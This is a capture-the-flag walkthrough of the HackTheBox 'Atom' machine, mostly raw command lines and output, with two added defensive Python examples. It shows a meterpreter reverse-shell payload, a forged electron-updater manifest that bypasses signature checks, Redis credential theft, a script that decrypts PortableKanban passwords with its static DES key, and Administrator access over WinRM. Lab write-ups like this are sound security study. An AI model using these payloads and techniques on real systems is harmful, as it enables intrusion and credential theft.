nmap -p- -T4 -A 10.10.10.237
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Heed Solutions
135/tcp open msrpc Microsoft Windows RPC
443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Heed Solutions
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6379/tcp open redis Redis key-value store
7680/tcp open pando-pub?
Service Info: Host: ATOM; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h30m41s, deviation: 4h02m30s, median: 10m40s
| smb-os-discovery:
| OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: ATOM
| NetBIOS computer name: ATOM\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-04-26T08:56:21-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-04-26T15:56:23
|_ start_date: N/A
$ dirb http://10.10.10.237
---- Entering directory: http://10.10.10.237/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.237/Images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.237/releases/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
kali@kali:~/0.htb/machines/Atom237$ smbclient -L //10.10.10.237/ -N
Enter WORKGROUP\kali's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Software_Updates Disk
SMB1 disabled -- no workgroup available
kali@kali:~/0.htb/machines/Atom237$ smbclient //10.10.10.237/Software_Updates
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Apr 26 12:01:33 2021
.. D 0 Mon Apr 26 12:01:33 2021
client1 D 0 Mon Apr 26 12:01:33 2021
client2 D 0 Mon Apr 26 12:01:33 2021
client3 D 0 Mon Apr 26 12:01:33 2021
UAT_Testing_Procedures.pdf A 35202 Fri Apr 9 07:18:08 2021
4413951 blocks of size 4096. 1354954 blocks available
Clues from the web site and from UAT_Testing_Procedures.pdf:
MrR3boot@atom.htb
Of course, from codepen.
https://codepen.io/
electron-builder (update signature bypass, see the Doyensec writeup):
https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html
$ msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.42 lport=1881 -f exe > "r'okan.exe"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
$ shasum -a 512 "r'okan.exe" | cut -d " " -f1 | xxd -r -p | base64 -w 0
e0nY0c2Zo+KeQTuSWXHdWaMgcFLaRcJGjj9ny5VQ+aa93Z305XZezLr0L66DF60SXjE3aTcmozG/eZzGvqNrIA==
latest.yml:
version: 1.2.3
path: http://10.10.14.42:8000/r'okan.exe
sha512: e0nY0c2Zo+KeQTuSWXHdWaMgcFLaRcJGjj9ny5VQ+aa93Z305XZezLr0L66DF60SXjE3aTcmozG/eZzGvqNrIA==
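The sha512 value in latest.yml is the base64 encoding of the raw SHA-512 digest (the `shasum | xxd -r -p | base64` pipeline above), and the path field here carries a filename with a single quote in it. As an added example, not code from this writeup or from electron-builder, here is the consumer-side check an updater should apply to such a manifest: recompute the digest over the downloaded bytes, require https and a pinned host, and reject any filename outside a plain allowlist. The sample manifest, the host updates.example.test and the artifact bytes are constructed for the example.

```python
import base64
import hashlib
import re
from typing import Dict, List

# Constructed sample (not the page's target): the flat latest.yml layout used
# above, with a placeholder host and a filename that contains a single quote
# like the one in the manifest above.
SAMPLE_LATEST_YML = """\
version: 1.2.3
path: http://UPDATE-HOST.example:8000/r'okan.exe
sha512: PLACEHOLDER
"""

# Filename allowlist: letters, digits, dot, underscore, dash. A quote or any
# other shell metacharacter fails this check.
SAFE_FILENAME = re.compile(r"^[A-Za-z0-9._-]+$")


def sha512_base64(data: bytes) -> str:
    """Base64 of the raw SHA-512 digest: the same value produced above with
    `shasum -a 512 | xxd -r -p | base64`."""
    return base64.b64encode(hashlib.sha512(data).digest()).decode("ascii")


def parse_latest_yml(text: str) -> Dict[str, str]:
    """Minimal parser for the flat key/value manifest shown above. Accepts
    both `key: value` and the `key : value` spacing used in the notes."""
    fields: Dict[str, str] = {}
    for line in text.splitlines():
        m = re.match(r"^\s*([A-Za-z0-9_]+)\s*:\s*(.*?)\s*$", line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def check_update(manifest: Dict[str, str], artifact: bytes,
                 expected_host: str) -> List[str]:
    """Return the reasons to reject this manifest/artifact pair (an empty
    list means every check passed). expected_host is the update origin the
    client was built to trust; it is an assumption of this example."""
    problems: List[str] = []
    path = manifest.get("path", "")
    m = re.match(r"^(https?)://([^/]+)/(?:.*/)?([^/]*)$", path)
    if m is None:
        problems.append("path is not a parseable http(s) URL")
    else:
        scheme, host, filename = m.groups()
        if scheme != "https":
            problems.append("path does not use https")
        if host != expected_host:
            problems.append(f"path host {host!r} is not the trusted update host")
        if not SAFE_FILENAME.match(filename):
            problems.append(f"filename {filename!r} contains characters outside [A-Za-z0-9._-]")
    # Digest check last: it only proves the bytes match the manifest, not
    # that the manifest itself came from a trusted origin.
    if manifest.get("sha512", "") != sha512_base64(artifact):
        problems.append("sha512 does not match the downloaded artifact")
    return problems


if __name__ == "__main__":
    artifact = b"constructed artifact bytes"
    manifest = parse_latest_yml(
        SAMPLE_LATEST_YML.replace("PLACEHOLDER", sha512_base64(artifact)))
    for problem in check_update(manifest, artifact, "updates.example.test"):
        print("reject:", problem)
```

Run stand-alone it rejects the sample manifest on three counts (plain http, untrusted host, quoted filename) even though the sha512 matches, which is the point: a digest that the manifest author controls says nothing about where the manifest came from.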
$ msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.10.14.42
lhost => 10.10.14.42
msf6 exploit(multi/handler) > set lport 1881
lport => 1881
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.42:1881
$ smbclient "\\\\10.10.10.237\Software_Updates"
smb: \> cd client3
smb: \client3\> put latest.yml
putting file latest.yml as \client3\latest.yml (2.0 kb/s) (average 1.5 kb/s)
smb: \client3\>
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.42:1881
[*] Sending stage (175174 bytes) to 10.10.10.237
[*] Meterpreter session 1 opened (10.10.14.42:1881 -> 10.10.10.237:65287) at 2021-06-18 14:33:27 -0400
meterpreter >
meterpreter > shell
Process 5088 created.
Channel 2 created.
Microsoft Windows [Version 10.0.19042.906]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>cd \Users\jason\Desktop
cd \Users\jason\Desktop
C:\Users\jason\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9793-C2E6
Directory of C:\Users\jason\Desktop
04/02/2021 10:29 PM <DIR> .
04/02/2021 10:29 PM <DIR> ..
03/31/2021 02:09 AM 2,353 heedv1.lnk
03/31/2021 02:09 AM 2,353 heedv2.lnk
03/31/2021 02:09 AM 2,353 heedv3.lnk
06/17/2021 09:57 PM 34 user.txt
4 File(s) 7,093 bytes
2 Dir(s) 5,521,301,504 bytes free
C:\Users\jason\Desktop>type user.txt
type user.txt
0c3fe169a45f05a23c3968cb6c334ade
winPEASx64.exe
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe/binaries/x64/Release
winPEAS points at the Redis install: redis.windows-service.conf and the redis-server service.
C:\Program Files\Redis>type redis.windows-service.conf
type redis.windows-service.conf
# Redis configuration file example
requirepass kidvscat_yes_kidvscat
https://gist.github.com/LeCoupa/1596b8f359ad8812c7271b5322c30946
$ redis-cli -h 10.10.10.237 -a kidvscat_yes_kidvscat
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.10.237:6379> keys *
1) "pk:ids:MetaDataClass"
2) "pk:ids:User"
3) "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
4) "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"
10.10.10.237:6379> get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
"{\"Id\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"Name\":\"Administrator\",\"Initials\":\"\",\"Email\":\"\",\"EncryptedPassword\":\"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi\",\"Role\":\"Admin\",\"Inactive\":false,\"TimeStamp\":637530169606440253}"
10.10.10.237:6379>
admin EncryptedPassword = Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi
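The Redis password above sits in plaintext in redis.windows-service.conf, readable from the low-privileged session, and the service answers on 6379 from the network. As an added example, not from this writeup or from Redis, here is a small Python audit of a redis.conf text that flags the settings that make that combination dangerous, with a constructed weak sample next to a hardened one. The 32-character password threshold, the CONFIG rename check and the placeholder secret are assumptions of the example.

```python
from typing import Dict, List

# Constructed sample in the style of the redis.windows-service.conf found
# above: a plaintext requirepass, no bind restriction, default commands.
WEAK_CONF = """\
# Redis configuration file example
port 6379
requirepass kidvscat_yes_kidvscat
"""

# Constructed hardened counterpart (the secret is a placeholder).
HARDENED_CONF = """\
port 6379
bind 127.0.0.1
protected-mode yes
requirepass REPLACE-WITH-A-LONG-RANDOM-SECRET
rename-command CONFIG ""
"""

# Assumed threshold: Redis answers AUTH very quickly, so short passwords are
# brute-forceable and are reported as a finding.
MIN_PASSWORD_LEN = 32
# Bind tokens that expose the listener on every interface.
WILDCARD_BINDS = {"0.0.0.0", "*", "::", "::*"}


def parse_redis_conf(text: str) -> Dict[str, List[str]]:
    """Return {directive: [argument strings]}. Directives may repeat
    (rename-command), so each maps to a list, in file order."""
    conf: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        conf.setdefault(parts[0].lower(), []).append(parts[1] if len(parts) > 1 else "")
    return conf


def audit_redis_conf(text: str) -> List[str]:
    """Return a list of findings; empty means none of these checks fired."""
    conf = parse_redis_conf(text)
    findings: List[str] = []

    binds = conf.get("bind")
    if binds is None:
        findings.append("no bind directive: Redis listens on every interface")
    else:
        # Redis 7 allows an optional "-" prefix on bind addresses; strip it.
        tokens = [t.lstrip("-") for b in binds for t in b.split()]
        if any(t in WILDCARD_BINDS for t in tokens):
            findings.append("bind includes a wildcard address")

    if any(v.strip().lower() == "no" for v in conf.get("protected-mode", [])):
        findings.append("protected-mode is disabled")

    passwords = conf.get("requirepass")
    if not passwords:
        findings.append("no requirepass: unauthenticated access")
    elif len(passwords[-1].strip()) < MIN_PASSWORD_LEN:
        findings.append(f"requirepass shorter than {MIN_PASSWORD_LEN} characters")

    renamed = {v.split()[0].upper() for v in conf.get("rename-command", []) if v.split()}
    if "CONFIG" not in renamed:
        findings.append("CONFIG command not renamed or disabled")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(text) or "no findings")
```

The audit cannot see file permissions, which were the other half of the problem on this box: whatever requirepass is set to, the config file that carries it has to be unreadable to ordinary users, and the password must not be reused anywhere else.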
kali@kali:~/0.htb/machines/Atom237$ sudo impacket-smbserver kali .
[sudo] password for kali:
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.237,65526)
[*] AUTHENTICATE_MESSAGE (\,ATOM)
[*] User ATOM\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:KALI)
*Evil-WinRM* PS C:\Users\jason\Downloads\PortableKanban> copy *.pdf \\10.10.14.42\kali
*Evil-WinRM* PS C:\Users\jason\Downloads\PortableKanban>
*Evil-WinRM* PS C:\Users\jason\Downloads> copy \\10.10.14.42\kali\winpeas.exe .
*Evil-WinRM* PS C:\Users\jason\Downloads> dir
*Evil-WinRM* PS C:\Users\jason\Downloads> ./winpeas >peas.txt
*Evil-WinRM* PS C:\Users\jason\Downloads> dir
Directory: C:\Users\jason\Downloads
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/31/2021 2:36 AM node_modules
d----- 6/18/2021 12:04 PM PortableKanban
-a---- 6/18/2021 1:27 PM 1515726 peas.txt
-a---- 6/18/2021 12:53 PM 1566720 winpeas.exe
*Evil-WinRM* PS C:\Users\jason\Downloads> copy peas.txt \\10.10.14.42\kali
*Evil-WinRM* PS C:\Users\jason\Downloads>
kali@kali:~/0.htb/machines/Atom237$ cat peas.txt |more
c:\Users\jason\Downloads\PortableKanban>
https://www.exploit-db.com/exploits/49409
https://www.torchsec.net/portablekanban-4-3-6578-38136-encrypted-password-disclosure-torchsec
decypt.py:
#!/usr/bin/env python3
import base64
from des import DesKey  # python3 -m pip install des


def decode(blob):
    # PortableKanban stores the field as base64 over DES-CBC output; the
    # key and IV below are the static ones the application uses.
    data = base64.b64decode(blob.encode('utf-8'))
    key = DesKey(b"7ly6UznJ")
    return key.decrypt(data, initial=b"XuVUm5fR", padding=True).decode('utf-8')


print(decode('Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi'))
kali@kali:~/0.htb/machines/Atom237$ python3 decypt.py
kidvscat_admin_@123
kali@kali:~/0.htb/machines/Atom237$
kali@kali:~/0.htb/machines/Atom237$ evil-winrm -i 10.10.10.237 -u 'administrator' -p 'kidvscat_admin_@123'
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
Directory: C:\Users\Administrator\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/2/2021 8:22 PM 608 dump.rdb
-a---- 4/2/2021 10:49 PM 204 run.bat
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
b7d7c5533b1bf1be01b7cea65b23db30
*Evil-WinRM* PS C:\Users\Administrator\Documents>